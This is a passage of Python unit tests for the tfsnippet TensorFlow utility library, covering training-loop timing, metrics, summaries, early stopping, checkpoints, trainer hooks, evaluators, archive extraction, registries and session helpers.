with loop.timeit('x_timer'):
time.sleep(0.01)
with loop.timeit('y_time'):
time.sleep(0.02)
loop.print_logs()
self.assertMatches('\n'.join(logs), re.compile(
r'^'
r'\[Step 0\] epoch time: 0\.0[345]\d*s; '
r'x timer: 0\.01\d*s; y time: 0\.0[23]\d*s'
r'$'
))
def test_metric_collector(self):
logs = []
with TrainLoop([], max_epoch=1, print_func=logs.append,
show_eta=False) as loop:
for _ in loop.iter_epochs():
with loop.metric_collector('x') as acc:
acc.collect(2)
acc.collect(3, weight=3)
loop.print_logs()
self.assertMatches('\n'.join(logs), re.compile(
r'^'
r'\[Step 0\] epoch time: [^ ]+s; x: 2\.75'
r'$'
))
def test_summary_writer(self):
def read_summary(summary_dir):
# read the metric summary
loss_steps = []
loss_values = []
valid_loss_steps = []
valid_loss_values = []
x_steps = []
x_values = []
tags = set()
event_file_path = os.path.join(
summary_dir, os.listdir(summary_dir)[0])
for e in tf.train.summary_iterator(event_file_path):
for v in e.summary.value:
tags.add(v.tag)
if v.tag == 'metrics/loss':
loss_steps.append(e.step)
loss_values.append(v.simple_value)
elif v.tag == 'metrics/valid_loss':
valid_loss_steps.append(e.step)
valid_loss_values.append(v.simple_value)
elif v.tag == 'x':
x_steps.append(e.step)
x_values.append(v.simple_value)
return (tags, loss_steps, loss_values, valid_loss_steps,
valid_loss_values, x_steps, x_values)
# test enable summary with `summary_dir`
with TemporaryDirectory() as tempdir:
with TrainLoop([], max_epoch=2, summary_dir=tempdir,
summary_graph=tf.get_default_graph()) as loop:
self.assertIsInstance(loop.summary_writer,
tf.summary.FileWriter)
for epoch in loop.iter_epochs():
for _, loss in loop.iter_steps([0.7, 0.6, 0.8]):
loop.collect_metrics(loss=epoch + loss)
loop.collect_metrics(valid_loss=epoch)
with self.test_session():
summary_op = tf.summary.scalar('x', tf.constant(1.23))
loop.add_summary(summary_op.eval())
obj = read_summary(tempdir)
self.assertEqual(
['metrics/loss', 'metrics/valid_loss', 'x'],
sorted(obj[0])
)
np.testing.assert_equal(obj[1], [1, 2, 3, 4, 5, 6])
np.testing.assert_almost_equal(
obj[2],
[1.7, 1.6, 1.8, 2.7, 2.6, 2.8]
)
np.testing.assert_equal(obj[3], [3, 6])
np.testing.assert_almost_equal(obj[4], [1, 2])
np.testing.assert_equal(obj[5], [6])
np.testing.assert_almost_equal(obj[6], [1.23])
# test enable summary with `summary_writer`
with TemporaryDirectory() as tempdir:
sw = tf.summary.FileWriter(tempdir)
with TrainLoop([], max_epoch=2, summary_writer=sw) as loop:
self.assertIs(loop.summary_writer, sw)
self.assertIs(loop._summary_writer, sw)
for epoch in loop.iter_epochs():
for _, loss in loop.iter_steps([0.7, 0.6, 0.8]):
loop.collect_metrics(loss=epoch + loss)
loop.collect_metrics(valid_loss=epoch)
sw.close()
self.assertEqual(
sorted(read_summary(tempdir)[0]),
['metrics/loss', 'metrics/valid_loss']
)
with TemporaryDirectory() as tempdir:
sw = tf.summary.FileWriter(tempdir)
with TrainLoop([], max_epoch=2, summary_writer=sw) as loop:
self.assertIs(loop._summary_writer, sw)
for epoch in loop.iter_epochs():
for _, loss in loop.iter_steps([0.7, 0.6, 0.8]):
loop.collect_metrics(loss=epoch + loss)
loop.collect_metrics(valid_loss=epoch)
sw.close()
self.assertEqual(
sorted(read_summary(tempdir)[0]),
['metrics/loss', 'metrics/valid_loss']
)
def test_early_stopping(self):
with self.test_session():
a = tf.get_variable('a', shape=(), dtype=tf.int32)
b = tf.get_variable('b', shape=(), dtype=tf.int32)
# test early-stopping with no valid metric committed
set_variable_values([a, b], [1, 2])
self.assertEqual(get_variable_values([a, b]), [1, 2])
with TrainLoop([a], early_stopping=True) as loop:
self.assertTrue(loop.use_early_stopping)
set_variable_values([a, b], [10, 20])
self.assertEqual(get_variable_values([a, b]), [10, 20])
# test early-stopping with smaller-better metric
set_variable_values([a, b], [1, 2])
self.assertEqual(get_variable_values([a, b]), [1, 2])
with TrainLoop([a], max_epoch=1, early_stopping=True) as loop:
for _ in loop.iter_epochs():
for step, valid_loss in loop.iter_steps([0.7, 0.6, 0.8]):
set_variable_values([a, b], [10 + step, 20 + step])
loop.collect_metrics(valid_loss=valid_loss)
self.assertAlmostEqual(loop.best_valid_metric, 0.6)
self.assertEqual(get_variable_values([a, b]), [12, 23])
# test early-stopping with larger-better metric
set_variable_values([a, b], [1, 2])
self.assertEqual(get_variable_values([a, b]), [1, 2])
with TrainLoop([a],
max_epoch=1,
valid_metric_name='y',
valid_metric_smaller_is_better=False,
early_stopping=True) as loop:
for _ in loop.iter_epochs():
for step, y in loop.iter_steps([0.7, 0.6, 0.8]):
set_variable_values([a, b], [10 + step, 20 + step])
loop.collect_metrics(y=y)
self.assertAlmostEqual(loop.best_valid_metric, 0.8)
self.assertEqual(get_variable_values([a, b]), [13, 23])
def test_checkpoint(self):
class MyObject(CheckpointSavableObject):
def __init__(self):
self.value = 123
def get_state(self):
return {'value': self.value}
def set_state(self, state):
self.value = state['value']
o = MyObject()
var = ScheduledVariable('var', initial_value=456, dtype=tf.int32)
with self.test_session() as sess, \
TemporaryDirectory() as tempdir:
ensure_variables_initialized()
with TrainLoop([var.variable],
checkpoint_dir=tempdir,
checkpoint_save_objects={'o': o}) as loop:
loop.make_checkpoint()
# test restore_checkpoint == True
o.value = 1234
var.set(4567)
self.assertEqual(o.value, 1234)
self.assertEqual(var.get(), 4567)
with TrainLoop([var.variable],
checkpoint_dir=tempdir,
checkpoint_save_objects={'o': o}):
self.assertEqual(loop.epoch, 0)
self.assertEqual(loop.step, 0)
self.assertEqual(o.value, 123)
self.assertEqual(var.get(), 456)
# test restore_checkpoint == False, and generate new checkpoints
o.value = 1234
var.set(4567)
with TrainLoop([var.variable],
checkpoint_dir=tempdir,
checkpoint_save_objects={'o': o},
checkpoint_epoch_freq=2,
restore_checkpoint=False,
max_epoch=8) as loop:
self.assertEqual(loop.epoch, 0)
self.assertEqual(loop.step, 0)
self.assertEqual(o.value, 1234)
self.assertEqual(var.get(), 4567)
for epoch in loop.iter_epochs():
for _ in loop.iter_steps([1, 1]):
pass
o.value = 9120 + epoch
var.set(9450 + epoch)
# restore from latest
with TrainLoop([var.variable],
checkpoint_dir=tempdir,
checkpoint_save_objects={'o': o}) as loop:
self.assertEqual(loop.epoch, 8)
self.assertEqual(loop.step, 16)
self.assertEqual(o.value, 9128)
self.assertEqual(var.get(), 9458)
# restore from specified file
for epoch in [2, 4, 6, 8]:
restore_checkpoint = os.path.join(
tempdir, 'checkpoint/checkpoint.dat-{}'.format(epoch * 2))
with TrainLoop([var.variable],
checkpoint_dir=tempdir,
checkpoint_save_objects={'o': o},
restore_checkpoint=restore_checkpoint) as loop:
self.assertEqual(loop.epoch, epoch)
self.assertEqual(loop.step, epoch * 2)
self.assertEqual(o.value, 9120 + epoch)
self.assertEqual(var.get(), 9450 + epoch)
def test_checkpoint_and_early_stopping(self):
with self.test_session(), TemporaryDirectory() as tempdir:
a = tf.get_variable('a', shape=(), dtype=tf.int32)
b = tf.get_variable('b', shape=(), dtype=tf.int32)
# test early-stopping with no valid metric committed
set_variable_values([a, b], [1, 2])
self.assertEqual(get_variable_values([a, b]), [1, 2])
with TrainLoop([a],
checkpoint_dir=tempdir,
early_stopping=True) as loop:
self.assertTrue(loop.use_early_stopping)
set_variable_values([a, b], [10, 20])
loop.make_checkpoint()
self.assertEqual(get_variable_values([a, b]), [10, 20])
# test early-stopping with smaller-better metric, 1st loop
set_variable_values([a, b], [1, 2])
with pytest.raises(KeyboardInterrupt):
with TrainLoop([a],
max_epoch=2,
checkpoint_dir=tempdir,
early_stopping=True) as loop:
self.assertIsNone(loop.best_valid_metric)
self.assertEqual(get_variable_values([a, b]), [10, 20])
for i, epoch in enumerate(loop.iter_epochs(), 1):
self.assertEqual(epoch, i)
for j, (step, valid_loss) in \
enumerate(loop.iter_steps([0.7, 0.6, 0.8]), 1):
self.assertEqual(step, j)
set_variable_values([a, b], [10 + step, 20 + step])
loop.collect_metrics(valid_loss=valid_loss)
loop.make_checkpoint()
raise KeyboardInterrupt()
# because the loop is interrupted, the early-stopping should not
# restore the variables to the best state
self.assertEqual(get_variable_values([a, b]), [13, 23])
# test early-stopping with smaller-better metric, 2nd loop
with TrainLoop([a],
max_epoch=2,
checkpoint_dir=tempdir,
early_stopping=True) as loop:
self.assertEqual(loop.best_valid_metric, 0.6)
self.assertEqual(get_variable_values([a, b]), [13, 23])
for i, epoch in enumerate(loop.iter_epochs(), 2):
self.assertEqual(epoch, i)
for j, (step, valid_loss) in \
enumerate(loop.iter_steps([0.9]), 4):
self.assertEqual(step, j)
set_variable_values([a, b], [10 + step, 20 + step])
loop.collect_metrics(valid_loss=valid_loss)
self.assertAlmostEqual(loop.best_valid_metric, 0.6)
self.assertEqual(get_variable_values([a, b]), [12, 24])
def test_tensor_arguments(self):
with self.test_session():
a = tf.get_variable('a', initializer=0, dtype=tf.int32)
ensure_variables_initialized()
with TrainLoop([a],
early_stopping=True,
max_epoch=tf.constant(6),
max_step=tf.constant(7)) as loop:
self.assertEqual(loop.max_epoch, 6)
self.assertEqual(loop.max_step, 7)
def test_errors(self):
with TemporaryDirectory() as tempdir:
with pytest.raises(ValueError, match='`checkpoint_epoch_freq` must '
'be a positive integer'):
with TrainLoop([], checkpoint_dir=tempdir,
checkpoint_epoch_freq=0):
pass
with pytest.raises(ValueError,
match='Currently `early_stopping = True` is not '
'supported when a file path is '
'specified for `restore_checkpoint`'):
with TrainLoop([],
checkpoint_dir=tempdir,
early_stopping=True,
restore_checkpoint=os.path.join(
tempdir, 'checkpoint.dat')):
pass
with pytest.raises(RuntimeError, match='Checkpoint directory is '
'not configured'):
with TrainLoop([]) as loop:
loop.make_checkpoint()
obj = Mock(
spec=CheckpointSavableObject,
get_state=Mock(return_value={}),
set_state=Mock()
)
with pytest.raises(KeyError, match='Name is reserved for '
'`checkpoint_save_objects`'):
with TrainLoop([], checkpoint_dir=tempdir,
checkpoint_save_objects={
TRAIN_LOOP_STATES_CKPT_NAME: obj
}):
pass
with pytest.raises(KeyError, match='Name is reserved for '
'`checkpoint_save_objects`'):
with TrainLoop([], checkpoint_dir=tempdir,
checkpoint_save_objects={
EARLY_STOPPING_STATES_CKPT_NAME: obj
}):
pass
with pytest.raises(
RuntimeError, match='Another epoch loop has been opened'):
with TrainLoop([], max_epoch=10) as loop:
for _ in loop.iter_epochs():
for _ in loop.iter_epochs():
pass
with pytest.raises(
RuntimeError, match='Step loop must be opened within active '
'epoch loop'):
with TrainLoop([], max_step=10) as loop:
for _ in loop.iter_steps():
pass
with pytest.raises(
RuntimeError, match='Another step loop has been opened'):
with TrainLoop([], max_epoch=10, max_step=10) as loop:
for _ in loop.iter_epochs():
for _ in loop.iter_steps():
for _ in loop.iter_steps():
pass
def require_context():
return pytest.raises(
RuntimeError, match='An epoch or a step loop is expected, '
'but neither has been opened')
with require_context():
with TrainLoop([]) as loop:
with loop.timeit('timer'):
pass
with require_context():
with TrainLoop([]) as loop:
with loop.metric_collector('metric'):
pass
with require_context():
with TrainLoop([]) as loop:
loop.collect_metrics(loss=1.)
with require_context():
with TrainLoop([]) as loop:
loop.println('', with_tag=True)
with require_context():
with TrainLoop([]) as loop:
loop.print_logs()
with pytest.raises(
RuntimeError, match='`data_generator` is required when '
'`max_step` is not configured, so as to '
'prevent an unstoppable step loop'):
with TrainLoop([], max_epoch=10) as loop:
for _ in loop.iter_epochs():
for _ in loop.iter_steps():
pass
with pytest.raises(
TypeError, match='`metrics` should be a dict'):
with TrainLoop([], max_epoch=10) as loop:
for _ in loop.iter_epochs():
loop.collect_metrics(())
```
#### File: tests/trainer/test_base_trainer.py
```python
import functools
import numpy as np
import pytest
import tensorflow as tf
from mock import Mock
from tfsnippet.dataflows import DataFlow
from tfsnippet.scaffold import TrainLoop, AnnealingVariable, EventKeys
from tfsnippet.trainer import *
from tfsnippet.utils import EventSource
class BaseTrainerTestCase(tf.test.TestCase):
def test_props(self):
loop = Mock(valid_metric_name='valid_loss')
t = BaseTrainer(loop)
self.assertIs(loop, t.loop)
self.assertIsInstance(t.events, EventSource)
def test_add_and_remove_hooks(self):
loop = Mock(
valid_metric_name='valid_loss',
print_logs=Mock(return_value=None, __repr__=lambda o: 'print_logs')
)
df = Mock()
eval1 = Evaluator(loop, 1., [], df)
eval2 = Evaluator(loop, 2., [], df)
anneal1 = AnnealingVariable('anneal1', 1., .5)
anneal2 = AnnealingVariable('anneal2', 2., .5)
# test add
t = BaseTrainer(loop)
t.log_after_steps(3)
t.log_after_epochs(4)
t.evaluate_after_steps(
Mock(return_value=None, __repr__=lambda o: 'eval'), 5)
t.evaluate_after_epochs(
Mock(return_value=None, __repr__=lambda o: 'eval'), 6)
t.anneal_after_steps(
Mock(return_value=None, __repr__=lambda o: 'anneal'), 7)
t.anneal_after_epochs(
Mock(return_value=None, __repr__=lambda o: 'anneal'), 8)
t.evaluate_after_steps(eval1, 9)
t.evaluate_after_epochs(eval2, 10)
t.anneal_after_steps(anneal1, 11)
t.anneal_after_epochs(anneal2, 12)
t.log_after(steps=13)
t.log_after(epochs=14)
t.evaluate_after(
Mock(return_value=None, __repr__=lambda o: 'eval2'),
steps=15
)
t.evaluate_after(
Mock(return_value=None, __repr__=lambda o: 'eval2'),
epochs=16
)
t.anneal_after(
Mock(return_value=None, __repr__=lambda o: 'anneal2'),
steps=17
)
t.anneal_after(
Mock(return_value=None, __repr__=lambda o: 'anneal2'),
epochs=18
)
self.assertEqual(
repr(t.events._event_handlers_map[EventKeys.STEP_EVALUATION]),
'[eval:step:5, {!r}:step:9, eval2:step:15]'.format(eval1.run)
)
self.assertEqual(
repr(t.events._event_handlers_map[EventKeys.STEP_ANNEALING]),
'[anneal:step:7, {!r}:step:11, anneal2:step:17]'.
format(anneal1.anneal)
)
self.assertEqual(
repr(t.events._event_handlers_map[EventKeys.STEP_LOGGING]),
'[print_logs:step:3, print_logs:step:13]'
)
self.assertEqual(
repr(t.events._event_handlers_map[EventKeys.EPOCH_EVALUATION]),
'[eval:epoch:6, {!r}:epoch:10, eval2:epoch:16]'.format(eval2.run)
)
self.assertEqual(
repr(t.events._event_handlers_map[EventKeys.EPOCH_ANNEALING]),
'[anneal:epoch:8, {!r}:epoch:12, anneal2:epoch:18]'.
format(anneal2.anneal)
)
self.assertEqual(
repr(t.events._event_handlers_map[EventKeys.EPOCH_LOGGING]),
'[print_logs:epoch:4, print_logs:epoch:14]'
)
# test remove
t.remove_log_hooks()
self.assertNotIn(
EventKeys.STEP_LOGGING, t.events._event_handlers_map)
self.assertNotIn(
EventKeys.EPOCH_LOGGING, t.events._event_handlers_map)
t.remove_validation_hooks()
self.assertNotIn(
EventKeys.STEP_EVALUATION, t.events._event_handlers_map)
self.assertNotIn(
EventKeys.EPOCH_EVALUATION, t.events._event_handlers_map)
t.remove_annealing_hooks()
self.assertNotIn(
EventKeys.STEP_ANNEALING, t.events._event_handlers_map)
self.assertNotIn(
EventKeys.EPOCH_ANNEALING, t.events._event_handlers_map)
# test error add
func_list = [
t.log_after,
functools.partial(t.evaluate_after, Mock()),
functools.partial(t.anneal_after, Mock()),
]
kwargs_list = [
{'steps': None, 'epochs': None},
{'steps': 1, 'epochs': 1}
]
for func in func_list:
for kwargs in kwargs_list:
with pytest.raises(
ValueError, match='One and only one of `epochs` and '
'`steps` should be specified'):
func(**kwargs)
def test_hook_freq(self):
loop = Mock(
valid_metric_name='valid_loss',
print_logs=Mock(return_value=None, __repr__=lambda o: 'print_logs')
)
t = BaseTrainer(loop)
f = Mock()
t.evaluate_after(f, steps=5)
for i in range(1, 6):
t.loop.step = i
t.events.fire(EventKeys.STEP_EVALUATION, t)
t.loop.step = 7
t.events.fire(EventKeys.STEP_EVALUATION, t)
t.loop.step = 10
t.events.fire(EventKeys.STEP_EVALUATION, t)
self.assertEqual(f.call_count, 2)
def test_run(self):
with self.test_session() as session:
df = DataFlow.arrays([np.arange(6, dtype=np.float32)], batch_size=4)
def log_event(m, trainer):
logged_events.append((m, trainer))
logged_events = []
# test default loss weight and merged feed dict
with TrainLoop([], max_epoch=2) as loop:
t = BaseTrainer(loop)
t._run_step = Mock(return_value=None)
t._iter_steps = Mock(wraps=lambda: loop.iter_steps(df))
for key in [EventKeys.BEFORE_EPOCH,
EventKeys.BEFORE_STEP,
EventKeys.STEP_ANNEALING,
EventKeys.STEP_EVALUATION,
EventKeys.STEP_LOGGING,
EventKeys.AFTER_STEP,
EventKeys.EPOCH_ANNEALING,
EventKeys.EPOCH_EVALUATION,
EventKeys.EPOCH_LOGGING,
EventKeys.AFTER_EPOCH]:
t.events.on(key, functools.partial(log_event, key))
t.run()
self.assertEqual(4, len(t._run_step.call_args_list))
for i, call_args in enumerate(t._run_step.call_args_list[:-2]):
call_session, call_payload = call_args[0]
self.assertIs(session, call_session)
self.assertEqual(i + 1, call_payload[0])
self.assertIsInstance(call_payload[1], tuple)
self.assertEqual(1, len(call_payload[1]))
np.testing.assert_equal(
np.arange(6, dtype=np.float32)[i * 4: (i + 1) * 4],
call_payload[1][0]
)
expected_logged_events = sum(
[
[
(EventKeys.BEFORE_EPOCH, t),
] + sum([
[
(EventKeys.BEFORE_STEP, t),
(EventKeys.STEP_EVALUATION, t),
(EventKeys.STEP_ANNEALING, t),
(EventKeys.STEP_LOGGING, t),
(EventKeys.AFTER_STEP, t),
]
for step in [0, 1]
], []) + [
(EventKeys.EPOCH_EVALUATION, t),
(EventKeys.EPOCH_ANNEALING, t),
(EventKeys.EPOCH_LOGGING, t),
(EventKeys.AFTER_EPOCH, t)
]
for epoch in [0, 1]
],
[]
)
self.assertListEqual(logged_events, expected_logged_events)
# test re-entrant error
with TrainLoop([], max_epoch=1) as loop:
t = BaseTrainer(loop)
t._run_step = Mock(return_value=None)
t._iter_steps = Mock(wraps=lambda: loop.iter_steps(df))
def reentrant_error(trainer):
self.assertIs(trainer, t)
with pytest.raises(
RuntimeError, match=r'`run\(\)` is not re-entrant'):
t.run()
reentrant_error = Mock(wraps=reentrant_error)
t.events.on(EventKeys.AFTER_STEP, reentrant_error)
t.run()
self.assertTrue(reentrant_error.called)
```
#### File: tests/trainer/test_evaluator.py
```python
import unittest
import numpy as np
import pytest
import tensorflow as tf
from mock import Mock
from tfsnippet.dataflows import DataFlow
from tfsnippet.scaffold import TrainLoop
from tfsnippet.trainer import *
from tfsnippet.utils import EventSource
class AutoBatchWeightTestCase(unittest.TestCase):
def test_auto_loss_weight(self):
self.assertEqual(5., auto_batch_weight(np.arange(5)))
self.assertEqual(7., auto_batch_weight(np.arange(7), np.arange(5)))
self.assertEqual(1., auto_batch_weight(None))
class EvaluatorTestCase(tf.test.TestCase):
def test_props(self):
loop = Mock(valid_metric_name='valid_loss')
df = Mock()
v = Evaluator(loop, 12, [34, 56], df)
self.assertIs(loop, v.loop)
with self.test_session():
self.assertEqual(12, v.metrics['valid_loss'].eval())
self.assertEqual([34, 56], v.inputs)
self.assertIs(v.data_flow, df)
self.assertEqual({}, v.feed_dict)
self.assertEqual('eval_time', v.time_metric_name)
self.assertIs(auto_batch_weight, v.batch_weight_func)
self.assertIsInstance(v.events, EventSource)
batch_weight_func = Mock(return_value=123.)
v = Evaluator(loop, {'valid_loss_x': 12}, [34, 56], df,
feed_dict={'a': 1},
time_metric_name='valid_time_x',
batch_weight_func=batch_weight_func)
with self.test_session():
self.assertEqual(12, v.metrics['valid_loss_x'].eval())
self.assertEqual('valid_time_x', v.time_metric_name)
self.assertIs(batch_weight_func, v.batch_weight_func)
def test_error(self):
with pytest.raises(ValueError, match='Metric is not a scalar tensor'):
_ = Evaluator(Mock(), {'x': tf.constant([1, 2])}, [], Mock())
def test_run(self):
with self.test_session() as session:
df = DataFlow.arrays([np.arange(6, dtype=np.float32)], batch_size=4)
ph = tf.placeholder(tf.float32, shape=[None])
ph2 = tf.placeholder(tf.float32, shape=[])
ph3 = tf.placeholder(tf.float32, shape=[])
# test default loss weight and merged feed dict
with TrainLoop([], max_epoch=1) as loop:
v = Evaluator(loop, tf.reduce_mean(ph), [ph], df,
feed_dict={ph2: 34})
v._run_batch = Mock(wraps=v._run_batch)
for epoch in loop.iter_epochs():
v.run({ph3: 56})
np.testing.assert_almost_equal(
2.5, loop._epoch_metrics._metrics['valid_loss'].mean)
np.testing.assert_almost_equal(
2.5, v.last_metrics_dict['valid_loss'])
self.assertIn('eval_time', loop._epoch_metrics._metrics)
self.assertEqual(2, len(v._run_batch.call_args_list))
for i, call_args in enumerate(v._run_batch.call_args_list):
call_session, call_feed_dict = call_args[0]
self.assertIs(session, call_session)
np.testing.assert_equal(
np.arange(6, dtype=np.float32)[i*4: (i+1)*4],
call_feed_dict[ph]
)
self.assertEqual(34, call_feed_dict[ph2])
self.assertEqual(56, call_feed_dict[ph3])
# test None loss weight and None time metric and override feed dict
with TrainLoop([], max_epoch=1) as loop:
v = Evaluator(loop, {'valid_loss_x': tf.reduce_mean(ph)},
[ph], df,
feed_dict={ph2: 34},
batch_weight_func=None,
time_metric_name=None)
v._run_batch = Mock(wraps=v._run_batch)
for epoch in loop.iter_epochs():
v.run({ph2: 56})
np.testing.assert_almost_equal(
3.0, loop._epoch_metrics._metrics['valid_loss_x'].mean)
np.testing.assert_almost_equal(
3.0, v.last_metrics_dict['valid_loss_x'])
self.assertNotIn('eval_time', loop._epoch_metrics._metrics)
for i, call_args in enumerate(v._run_batch.call_args_list):
call_session, call_feed_dict = call_args[0]
self.assertEqual(56, call_feed_dict[ph2])
self.assertNotIn(ph3, call_feed_dict)
```
#### File: tests/utils/_div_op.py
```python
def regular_div(x, y):
return x / y
def floor_div(x, y):
return x // y
```
#### File: tests/utils/test_debugging.py
```python
import pytest
import numpy as np
import tensorflow as tf
from tfsnippet.utils import *
class AssertionTestCase(tf.test.TestCase):
def test_assert_deps(self):
ph = tf.placeholder(dtype=tf.bool, shape=())
op = tf.assert_equal(ph, True, message='abcdefg')
# test ops are empty
with assert_deps([None]) as asserted:
self.assertFalse(asserted)
# test assertion enabled, and ops are not empty
with self.test_session() as sess, \
scoped_set_config(settings, enable_assertions=True):
with assert_deps([op, None]) as asserted:
self.assertTrue(asserted)
out = tf.constant(1.)
with pytest.raises(Exception, match='abcdefg'):
self.assertEqual(sess.run(out, feed_dict={ph: False}), 1.)
# test assertion disabled
with self.test_session() as sess, \
scoped_set_config(settings, enable_assertions=False):
with assert_deps([op, None]) as asserted:
self.assertFalse(asserted)
out = tf.constant(1.)
self.assertEqual(sess.run(out, feed_dict={ph: False}), 1.)
class CheckNumericsTestCase(tf.test.TestCase):
def test_check_numerics(self):
# test enabled
ph = tf.placeholder(dtype=tf.float32, shape=())
with scoped_set_config(settings, check_numerics=True):
x = maybe_check_numerics(ph, message='numerical issues')
with pytest.raises(Exception, match='numerical issues'):
with self.test_session() as sess:
_ = sess.run(x, feed_dict={ph: np.nan})
# test disabled
with scoped_set_config(settings, check_numerics=False):
x = maybe_check_numerics(
tf.constant(np.nan), message='numerical issues')
with self.test_session() as sess:
self.assertTrue(np.isnan(sess.run(x)))
class AddHistogramTestCase(tf.test.TestCase):
def test_add_histogram(self):
with tf.name_scope('parent'):
x = tf.constant(0., name='x')
y = tf.constant(1., name='y')
z = tf.constant(2., name='z')
w = tf.constant(3., name='w')
# test enabled
with scoped_set_config(settings, auto_histogram=True):
maybe_add_histogram(x, strip_scope=True)
maybe_add_histogram(y, summary_name='the_tensor')
maybe_add_histogram(z, collections=[tf.GraphKeys.SUMMARIES])
# test disabled
with scoped_set_config(settings, auto_histogram=False):
maybe_add_histogram(w)
self.assertListEqual(
[op.name for op in tf.get_collection(GraphKeys.AUTO_HISTOGRAM)],
['maybe_add_histogram/x:0', 'maybe_add_histogram_1/the_tensor:0']
)
self.assertListEqual(
[op.name for op in tf.get_collection(tf.GraphKeys.SUMMARIES)],
['maybe_add_histogram_2/parent/z:0']
)
```
#### File: tests/utils/test_extractor.py
```python
import os
import shutil
import sys
import unittest
import pytest
from tfsnippet.utils import *
class ExtractorTestCase(unittest.TestCase):
def check_archive_file(self, extractor_class, archive_file, alias=None):
if alias is not None:
with TemporaryDirectory() as tmpdir:
new_archive_file = os.path.join(tmpdir, alias)
shutil.copy(archive_file, new_archive_file)
self.check_archive_file(extractor_class, new_archive_file)
else:
with Extractor.open(archive_file) as e:
self.assertIsInstance(e, extractor_class)
files = [(n, f.read()) for n, f in e.iter_extract()]
self.assertListEqual(
[
('a/1.txt', b'a/1.txt'),
('b/2.txt', b'b/2.txt'),
('c.txt', b'c.txt'),
],
files
)
def get_asset(self, name):
return os.path.join(
os.path.split(os.path.abspath(__file__))[0],
'assets',
name
)
def test_zip(self):
self.check_archive_file(ZipExtractor, self.get_asset('payload.zip'))
def test_rar(self):
self.check_archive_file(RarExtractor, self.get_asset('payload.rar'))
def test_tar(self):
self.check_archive_file(TarExtractor, self.get_asset('payload.tar'))
# xz
if sys.version_info[:2] >= (3, 3):
self.check_archive_file(
TarExtractor, self.get_asset('payload.tar.xz'))
self.check_archive_file(
TarExtractor, self.get_asset('payload.tar.xz'), 'payload.txz')
# gz
self.check_archive_file(TarExtractor, self.get_asset('payload.tar.gz'))
self.check_archive_file(TarExtractor, self.get_asset('payload.tar.gz'),
'payload.tgz')
# bz2
self.check_archive_file(TarExtractor, self.get_asset('payload.tar.bz2'))
self.check_archive_file(TarExtractor, self.get_asset('payload.tar.bz2'),
'payload.tbz')
self.check_archive_file(TarExtractor, self.get_asset('payload.tar.bz2'),
'payload.tbz2')
self.check_archive_file(TarExtractor, self.get_asset('payload.tar.bz2'),
'payload.tb2')
def test_errors(self):
with TemporaryDirectory() as tmpdir:
archive_file = os.path.join(tmpdir, 'payload.txt')
with open(archive_file, 'wb') as f:
f.write(b'')
with pytest.raises(
IOError, match='File is not a supported archive file'):
with Extractor.open(archive_file):
pass
```
#### File: tests/utils/test_registry.py
```python
import unittest
import pytest
from tfsnippet.utils import BaseRegistry, ClassRegistry
class RegistryTestCase(unittest.TestCase):
def test_base_registry(self):
a = object()
b = object()
# test not ignore case
r = BaseRegistry(ignore_case=False)
self.assertFalse(r.ignore_case)
r.register('a', a)
self.assertIs(r.get('a'), a)
with pytest.raises(KeyError, match='Object not registered: \'A\''):
_ = r.get('A')
self.assertListEqual(list(r), ['a'])
with pytest.raises(KeyError, match='Object already registered: \'a\''):
_ = r.register('a', a)
with pytest.raises(KeyError, match='Object not registered: \'b\''):
_ = r.get('b')
r.register('A', b)
self.assertIs(r.get('A'), b)
self.assertListEqual(list(r), ['a', 'A'])
# test ignore case
r = BaseRegistry(ignore_case=True)
self.assertTrue(r.ignore_case)
r.register('a', a)
self.assertIs(r.get('a'), a)
self.assertIs(r.get('A'), a)
self.assertListEqual(list(r), ['a'])
with pytest.raises(KeyError, match='Object already registered: \'A\''):
_ = r.register('A', a)
with pytest.raises(KeyError, match='Object not registered: \'b\''):
_ = r.get('b')
r.register('B', b)
self.assertIs(r.get('b'), b)
self.assertIs(r.get('B'), b)
self.assertListEqual(list(r), ['a', 'B'])
def test_class_registry(self):
r = ClassRegistry()
with pytest.raises(TypeError, match='`obj` is not a class: 123'):
r.register('int', 123)
class MyClass(object):
def __init__(self, value, message):
self.value = value
self.message = message
r.register('MyClass', MyClass)
self.assertIs(r.get('MyClass'), MyClass)
o = r.construct('MyClass', 123, message='message')
self.assertIsInstance(o, MyClass)
self.assertEqual(o.value, 123)
self.assertEqual(o.message, 'message')
```
#### File: tests/utils/test_session.py
```python
import pytest
import tensorflow as tf
from tfsnippet.shortcuts import global_reuse
from tfsnippet.utils import (get_default_session_or_error,
get_variables_as_dict,
get_uninitialized_variables,
ensure_variables_initialized,
create_session,
get_variable_ddi)
class CreateSessionTestCase(tf.test.TestCase):
def test_create_session(self):
with pytest.raises(TypeError, match='`lock_memory` must be True, '
'False or float'):
_ = create_session(lock_memory='')
# test with default options
session = create_session()
self.assertFalse(session._config.gpu_options.allow_growth)
self.assertFalse(session._config.log_device_placement)
self.assertTrue(session._config.allow_soft_placement)
# test with various options
session = create_session(lock_memory=0.5, log_device_placement=True,
allow_soft_placement=False)
self.assertEqual(
session._config.gpu_options.per_process_gpu_memory_fraction, .5)
self.assertTrue(session._config.log_device_placement)
self.assertFalse(session._config.allow_soft_placement)
# test with lock_memory = False
session = create_session(lock_memory=False)
self.assertTrue(session._config.gpu_options.allow_growth)
class GetDefaultSessionOrErrorTestCase(tf.test.TestCase):
def test_get_default_session_or_error(self):
with pytest.raises(RuntimeError, match='No session is active'):
get_default_session_or_error()
with self.test_session(use_gpu=False) as sess:
self.assertIs(sess, get_default_session_or_error())
with pytest.raises(RuntimeError, match='No session is active'):
get_default_session_or_error()
class GetVariablesTestCase(tf.test.TestCase):
def test_get_variables_as_dict(self):
GLOBAL_VARIABLES = tf.GraphKeys.GLOBAL_VARIABLES
MODEL_VARIABLES = tf.GraphKeys.MODEL_VARIABLES
LOCAL_VARIABLES = tf.GraphKeys.LOCAL_VARIABLES
# create the variables to be checked
a = tf.get_variable(
'a', shape=(), collections=[GLOBAL_VARIABLES, MODEL_VARIABLES])
b = tf.get_variable(
'b', shape=(), collections=[GLOBAL_VARIABLES])
c = tf.get_variable(
'c', shape=(), collections=[MODEL_VARIABLES])
with tf.variable_scope('child') as child:
child_a = tf.get_variable(
'a', shape=(),
collections=[GLOBAL_VARIABLES, MODEL_VARIABLES])
child_b = tf.get_variable(
'b', shape=(), collections=[GLOBAL_VARIABLES])
child_c = tf.get_variable(
'c', shape=(), collections=[MODEL_VARIABLES])
# test to get variables as dict
self.assertEqual(
get_variables_as_dict(),
{'a': a, 'b': b, 'child/a': child_a, 'child/b': child_b}
)
self.assertEqual(
get_variables_as_dict(collection=MODEL_VARIABLES),
